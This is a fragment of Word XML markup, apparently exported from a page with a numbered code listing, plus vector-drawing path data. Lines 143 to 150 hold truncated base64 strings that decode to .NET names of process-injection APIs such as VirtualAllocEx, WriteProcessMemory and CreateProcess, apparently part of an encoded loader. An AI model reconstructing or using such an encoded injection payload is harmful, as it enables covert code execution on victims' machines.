          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>p"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>143</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"bmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVzAGxwUHJvY2Vzc0F0d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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>HJ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>p"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>144</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"YnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBDcmVhdGVQcm9jZXNzR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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>h"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>145</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"Z3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMAZHdZQ291bnRDaGFyc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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>U"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>146</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBBZGRyZXNzAGxwU3Rhc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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>nR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>B"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>147</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"ZGRyZXNzAENvbmNhdABPYmplY3QAZmxQcm90ZWN0AGxwRW52aXJvbm1lbnQAQ29udmVydABoU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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>k"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>148</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"SW5wdXQAaFN0ZE91dHB1dAB3U2hvd1dpbmRvdwBWaXJ0dWFsQWxsb2NFeABiaW5hcnkAV3Jpd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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>GV</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Q"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>149</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"cm9jZXNzTWVtb3J5AGxwQ3VycmVudERpcmVjdG9yeQBvcF9FcXVhbGl0eQBvcF9JbmVxdWFsa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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>XR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>5"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="92" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1319" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>150</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11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=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="12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&amp;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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"AAAAAAABABlQAHIAbwBnAHIAYQBtAFcANgA0ADMAMgAADXcAaQBuAGQAaQByAAAVXABTAHkAc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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>wB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>X"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group style="position:absolute;margin-left:523.631pt;margin-top:0.0pt;width:0.0pt;height:842.0pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10472,0" coordsize="0,16840">
        <v:shape style="position:absolute;left:10472;top:0;width:0;height:16840" coordorigin="10472,0" coordsize="0,16840" path="m10472,0l10472,0,10472,0,10472,0,10472,0,10472,0,10472,1,10472,2,10472,3,10472,5,10472,7,10472,9,10472,13,10472,17,10472,21,10472,27,10472,33,10472,40,10472,49,10472,58,10472,68,10472,79,10472,92,10472,106,10472,121,10472,138,10472,156,10472,175,10472,196,10472,219,10472,243,10472,269,10472,297,10472,327,10472,359,10472,392,10472,428,10472,466,10472,506,10472,548,10472,592,10472,639,10472,688,10472,740,10472,794,10472,851,10472,910,10472,972,10472,1037,10472,1105,10472,1175,10472,1249,10472,1325,10472,1405,10472,1487,10472,1573,10472,1662,10472,1754,10472,1850,10472,1949,10472,2052,10472,2158,10472,2268,10472,2381,10472,2498,10472,2619,10472,2744,10472,2872,10472,3005,10472,3142,10472,3282,10472,3427,10472,3576,10472,3729,10472,3887,10472,4049,10472,4215,10472,4386,10472,4562,10472,4742,10472,4927,10472,5116,10472,5310,10472,5509,10472,5713,10472,5922,10472,6137,10472,6356,10472,6580,10472,6810,10472,7044,10472,7284,10472,7530,10472,7781,10472,8038,10472,8300,10472,8567,10472,8841,10472,9120,10472,9405,10472,9696,10472,9993,10472,10295,10472,10604,10472,10919,10472,11240,10472,11568,10472,11901,10472,12242,10472,12588,10472,12941,10472,13300,10472,13666,10472,14039,10472,14419,10472,14805,10472,15198,10472,15598,10472,16005,10472,16419,10472,16840e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:48.500pt;width:455.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,970" coordsize="9110,570">
        <v:shape style="position:absolute;left:1430;top:970;width:9110;height:570" coordorigin="1430,970" coordsize="9110,570" path="m1440,999l1440,999,1440,999,1440,999,1441,999,1441,999,1441,999,1442,999,1442,999,1443,999,1444,999,1446,999,1448,999,1450,999,1452,999,1455,999,1459,999,1463,999,1467,999,1472,999,1477,999,1484,999,1490,999,1498,999,1506,999,1515,999,1525,999,1535,999,1547,999,1559,999,1572,999,1586,999,1601,999,1617,999,1635,999,1653,999,1672,999,1692,999,1714,999,1737,999,1761,999,1786,999,1813,999,1841,999,1870,999,1901,999,1933,999,1966,999,2001,999,2038,999,2076,999,2116,999,2157,999,2200,999,2245,999,2291,999,2339,999,2389,999,2441,999,2494,999,2550,999,2607,999,2667,999,2728,999,2791,999,2856,999,2924,999,2993,999,3065,999,3139,999,3215,999,3293,999,3374,999,3457,999,3542,999,3629,999,3719,999,3812,999,3907,999,4004,999,4104,999,4206,999,4311,999,4419,999,4529,999,4642,999,4758,999,4876,999,4998,999,5122,999,5249,999,5378,999,5511,999,5647,999,5785,999,5927,999,6072,999,6220,999,6371,999,6525,999,6682,999,6842,999,7006,999,7173,999,7343,999,7517,999,7694,999,7874,999,8058,999,8245,999,8436,999,8630,999,8828,999,9030,999,9235,999,9444,999,9656,999,9872,999,10092,999,10316,999,10543,999,10543,999,10543,999,10543,999,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1000,10543,1001,10543,1001,10543,1001,10543,1001,10543,1002,10543,1002,10543,1003,10543,1003,10543,1004,10543,1004,10543,1005,10543,1005,10543,1006,10543,1007,10543,1008,10543,1008,10543,1009,10543,1010,10543,1011,10543,1013,10543,1014,10543,1015,10543,1016,10543,1018,10543,1019,10543,1021,10543,1022,10543,1024,10543,1026,10543,1028,10543,1030,10543,1032,10543,1034,10543,1036,10543,1038,10543,1041,10543,1043,10543,1046,10543,1049,10543,1052,10543,1055,10543,1058,10543,1061,10543,1064,10543,1067,10543,1071,10543,1075,10543,1078,10543,1082,10543,1086,10543,1090,10543,1095,10543,1099,10543,1104,10543,1108,10543,1113,10543,1118,10543,1123,10543,1128,10543,1134,10543,1139,10543,1145,10543,1151,10543,1157,10543,1163,10543,1169,10543,1175,10543,1182,10543,1189,10543,1196,10543,1203,10543,1210,10543,1217,10543,1225,10543,1233,10543,1241,10543,1249,10543,1257,10543,1266,10543,1274,10543,1283,10543,1292,10543,1301,10543,1311,10543,1321,10543,1330,10543,1340,10543,1351,10543,1361,10543,1372,10543,1383,10543,1394,10543,1405,10543,1416,10543,1428,10543,1440,10543,1452,10543,1464,10543,1477,10543,1490,10543,1503,10543,1516,10543,1529,10543,1543,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10542,1557,10542,1557,10541,1557,10540,1557,10538,1557,10536,1557,10534,1557,10532,1557,10529,1557,10525,1557,10521,1557,10517,1557,10512,1557,10506,1557,10500,1557,10493,1557,10486,1557,10478,1557,10469,1557,10459,1557,10449,1557,10437,1557,10425,1557,10412,1557,10398,1557,10383,1557,10366,1557,10349,1557,10331,1557,10312,1557,10291,1557,10270,1557,10247,1557,10223,1557,10198,1557,10171,1557,10143,1557,10114,1557,10083,1557,10051,1557,10018,1557,9983,1557,9946,1557,9908,1557,9868,1557,9827,1557,9784,1557,9739,1557,9693,1557,9645,1557,9595,1557,9543,1557,9489,1557,9434,1557,9377,1557,9317,1557,9256,1557,9193,1557,9127,1557,9060,1557,8990,1557,8919,1557,8845,1557,8769,1557,8691,1557,8610,1557,8527,1557,8442,1557,8354,1557,8265,1557,8172,1557,8077,1557,7980,1557,7880,1557,7778,1557,7673,1557,7565,1557,7455,1557,7342,1557,7226,1557,7108,1557,6986,1557,6862,1557,6735,1557,6605,1557,6473,1557,6337,1557,6198,1557,6057,1557,5912,1557,5764,1557,5613,1557,5459,1557,5302,1557,5142,1557,4978,1557,4811,1557,4641,1557,4467,1557,4290,1557,4110,1557,3926,1557,3739,1557,3548,1557,3354,1557,3156,1557,2954,1557,2749,1557,2540,1557,2328,1557,2112,1557,1892,1557,1668,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1557,1440,1556,1440,1556,1440,1556,1440,1556,1440,1555,1440,1555,1440,1555,1440,1554,1440,1554,1440,1554,1440,1553,1440,1553,1440,1552,1440,1551,1440,1551,1440,1550,1440,1549,1440,1548,1440,1547,1440,1546,1440,1545,1440,1544,1440,1543,1440,1542,1440,1540,1440,1539,1440,1537,1440,1536,1440,1534,1440,1533,1440,1531,1440,1529,1440,1527,1440,1525,1440,1523,1440,1520,1440,1518,1440,1516,1440,1513,1440,1511,1440,1508,1440,1505,1440,1502,1440,1499,1440,1496,1440,1493,1440,1489,1440,1486,1440,1482,1440,1478,1440,1474,1440,1470,1440,1466,1440,1462,1440,1458,1440,1453,1440,1448,1440,1444,1440,1439,1440,1434,1440,1428,1440,1423,1440,1417,1440,1412,1440,1406,1440,1400,1440,1394,1440,1388,1440,1381,1440,1375,1440,1368,1440,1361,1440,1354,1440,1347,1440,1339,1440,1332,1440,1324,1440,1316,1440,1308,1440,1299,1440,1291,1440,1282,1440,1273,1440,1264,1440,1255,1440,1246,1440,1236,1440,1226,1440,1216,1440,1206,1440,1196,1440,1185,1440,1174,1440,1163,1440,1152,1440,1140,1440,1129,1440,1117,1440,1105,1440,1092,1440,1080,1440,1067,1440,1054,1440,1041,1440,1027,1440,1013,1440,999e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:49.500pt;width:1.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,990" coordsize="30,570">
        <v:shape style="position:absolute;left:1430;top:990;width:30;height:570" coordorigin="1430,990" coordsize="30,570" path="m1447,999l1447,999,1447,999,1447,999,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1000,1447,1001,1447,1001,1447,1001,1447,1001,1447,1002,1447,1002,1447,1003,1447,1003,1447,1004,1447,1004,1447,1005,1447,1005,1447,1006,1447,1007,1447,1008,1447,1008,1447,1009,1447,1010,1447,1011,1447,1013,1447,1014,1447,1015,1447,1016,1447,1018,1447,1019,1447,1021,1447,1022,1447,1024,1447,1026,1447,1028,1447,1030,1447,1032,1447,1034,1447,1036,1447,1038,1447,1041,1447,1043,1447,1046,1447,1049,1447,1052,1447,1055,1447,1058,1447,1061,1447,1064,1447,1067,1447,1071,1447,1075,1447,1078,1447,1082,1447,1086,1447,1090,1447,1095,1447,1099,1447,1104,1447,1108,1447,1113,1447,1118,1447,1123,1447,1128,1447,1134,1447,1139,1447,1145,1447,1151,1447,1157,1447,1163,1447,1169,1447,1175,1447,1182,1447,1189,1447,1196,1447,1203,1447,1210,1447,1217,1447,1225,1447,1233,1447,1241,1447,1249,1447,1257,1447,1266,1447,1274,1447,1283,1447,1292,1447,1301,1447,1311,1447,1321,1447,1330,1447,1340,1447,1351,1447,1361,1447,1372,1447,1383,1447,1394,1447,1405,1447,1416,1447,1428,1447,1440,1447,1452,1447,1464,1447,1477,1447,1490,1447,1503,1447,1516,1447,1529,1447,1543,1447,1557e" filled="f" stroked="t" strokeweight="0.648pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:71.500pt;margin-top:76.500pt;width:455.500pt;height:28.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1430,1530" coordsize="9110,570">
        <v:shape style="position:absolute;left:1430;top:1530;width:9110;height:570" coordorigin="1430,1530" coordsize="9110,570" path="m1440,1557l1440,1557,1440,1557,1440,1557,1441,1557,1441,1557,1441,1557,1442,1557,1442,1557,1443,1557,1444,1557,1446,1557,1448,1557,1450,1557,1452,1557,1455,1557,1459,1557,1463,1557,1467,1557,1472,1557,1477,1557,1484,1557,1490,1557,1498,1557,1506,1557,1515,1557,1525,1557,1535,1557,1547,1557,1559,1557,1572,1557,1586,1557,1601,1557,1617,1557,1635,1557,1653,1557,1672,1557,1692,1557,1714,1557,1737,1557,1761,1557,1786,1557,1813,1557,1841,1557,1870,1557,1901,1557,1933,1557,1966,1557,2001,1557,2038,1557,2076,1557,2116,1557,2157,1557,2200,1557,2245,1557,2291,1557,2339,1557,2389,1557,2441,1557,2494,1557,2550,1557,2607,1557,2667,1557,2728,1557,2791,1557,2856,1557,2924,1557,2993,1557,3065,1557,3139,1557,3215,1557,3293,1557,3374,1557,3457,1557,3542,1557,3629,1557,3719,1557,3812,1557,3907,1557,4004,1557,4104,1557,4206,1557,4311,1557,4419,1557,4529,1557,4642,1557,4758,1557,4876,1557,4998,1557,5122,1557,5249,1557,5378,1557,5511,1557,5647,1557,5785,1557,5927,1557,6072,1557,6220,1557,6371,1557,6525,1557,6682,1557,6842,1557,7006,1557,7173,1557,7343,1557,7517,1557,7694,1557,7874,1557,8058,1557,8245,1557,8436,1557,8630,1557,8828,1557,9030,1557,9235,1557,9444,1557,9656,1557,9872,1557,10092,1557,10316,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1557,10543,1558,10543,1558,10543,1558,10543,1558,10543,1558,10543,1558,10543,1559,10543,1559,10543,1559,10543,1560,10543,1560,10543,1561,10543,1561,10543,1562,10543,1562,10543,1563,10543,1563,10543,1564,10543,1565,10543,1566,10543,1567,10543,1568,10543,1569,10543,1570,10543,1571,10543,1572,10543,1573,10543,1575,10543,1576,10543,1578,10543,1579,10543,1581,10543,1583,10543,1585,10543,1587,10543,1589,10543,1591,10543,1593,10543,1595,10543,1597,10543,1600,10543,1603,10543,1605,10543,1608,10543,1611,10543,1614,10543,1617,10543,1620,10543,1623,10543,1627,10543,1630,10543,1634,10543,1638,10543,1642,10543,1646,10543,1650,10543,1654,10543,16